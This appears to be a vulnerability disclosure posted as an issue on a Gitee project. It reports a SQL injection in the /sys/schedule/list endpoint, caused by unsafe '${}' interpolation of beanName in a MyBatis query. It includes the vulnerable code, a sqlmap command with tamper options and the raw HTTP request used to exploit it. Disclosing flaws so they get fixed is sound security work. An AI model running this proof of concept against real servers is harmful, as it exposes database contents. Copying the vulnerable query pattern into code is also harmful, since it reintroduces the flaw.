SQL injection vulnerability on /sys/schedule/list

# Summary

In the latest version, a parameter passed to the endpoint /sys/schedule/list are user-controllable and not sanitized, and no prepared statements are used when executing the final SQL query, resulting in a SQL injection vulnerability. Attackers can exploit this vulnerability to obtain sensitive data from the database and even gain complete control of the server.

---

# Details

### tested version:
- commit (2025-06-29):
https://gitee.com/fuyang_lipengjun/platform/commit/ca9aceff6902feb7b0b6bf510842aea88430796a

### vulnerable endpoint with parameter:

- http://127.0.0.1:8090/sys/schedule/list?beanName=1

### taint analysis:

- platform-schedule/src/main/java/com/platform/controller/ScheduleJobController.java
```
@RestController
@RequestMapping("/sys/schedule")
public class ScheduleJobController {
    @Autowired
    private ScheduleJobService scheduleJobService;

@GetMapping("/list")
    @RequiresPermissions("sys:schedule:list")
    public R list(@RequestParam Map<String, Object> params) {
        PageUtilsPlus pageUtil = scheduleJobService.queryPage(params);
        return R.ok().put("page", pageUtil);
    }
    
 
 public PageUtilsPlus queryPage(Map<String, Object> params) {

params.put("sidx", "T.CREATE_TIME");
    params.put("asc", false);
    Page<ScheduleJobEntity> page = new QueryPlus<ScheduleJobEntity>(params).getPage();
    return new PageUtilsPlus(page.setRecords(baseMapper.selectScheduleJobPage(page, params)));
}
```

- com/platform/dao/ScheduleJobDao.xml
```
<select id="selectScheduleJobPage" resultType="com.platform.entity.ScheduleJobEntity">
    SELECT
    T.JOB_ID,
    T.BEAN_NAME,
    T.METHOD_NAME,
    T.PARAMS,
    T.CRON_EXPRESSION,
    T.STATUS,
    T.REMARK,
    T.CREATE_TIME
    FROM SCHEDULE_JOB T
    WHERE 1=1
    <if test="params.beanName != null and params.beanName.trim() != ''">
       AND T.BEAN_NAME LIKE '%${params.beanName}%'
    </if>
</select>
```

---

# POC - sqlmap
```
python sqlmap.py -r request.txt --dbms=MySQL -p beanName  --tamper=charencode,between  --level 5 --flush-session -v 3 --current-user```

- request.txt:
```
GET  /sys/schedule/list?beanName=1 HTTP/1.1
Host: 127.0.0.1:8090
sec-ch-ua: "Chromium";v="117", "Not;A=Brand";v="8"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Accept-Language: en,zh;q=0.9,zh-CN;q=0.8
Cookie: Hm_lvt_0febd9e3cacb3f627ddac64d52caac39=1751943490; JSESSIONID=1c82df05-f51c-4643-beab-44ed710954e6; Hm_lvt_4656e49e8efa9f2ad6868ea26fb8984c=1752038683; HMACCOUNT=07E32C2CE82754B5; Hm_lpvt_4656e49e8efa9f2ad6868ea26fb8984c=1752040268
Connection: close

```
![输入图片说明](https://foruda.gitee.com/images/1752148522789697565/adafe06b_8279293.png "屏幕截图")

---

# Impact
https://portswigger.net/web-security/sql-injection#what-is-the-impact-of-a-successful-sql-injection-attack

---

GVP 微同软件/微同商城

内容风险标识

评论 (0)

GVP微同软件/微同商城

内容风险标识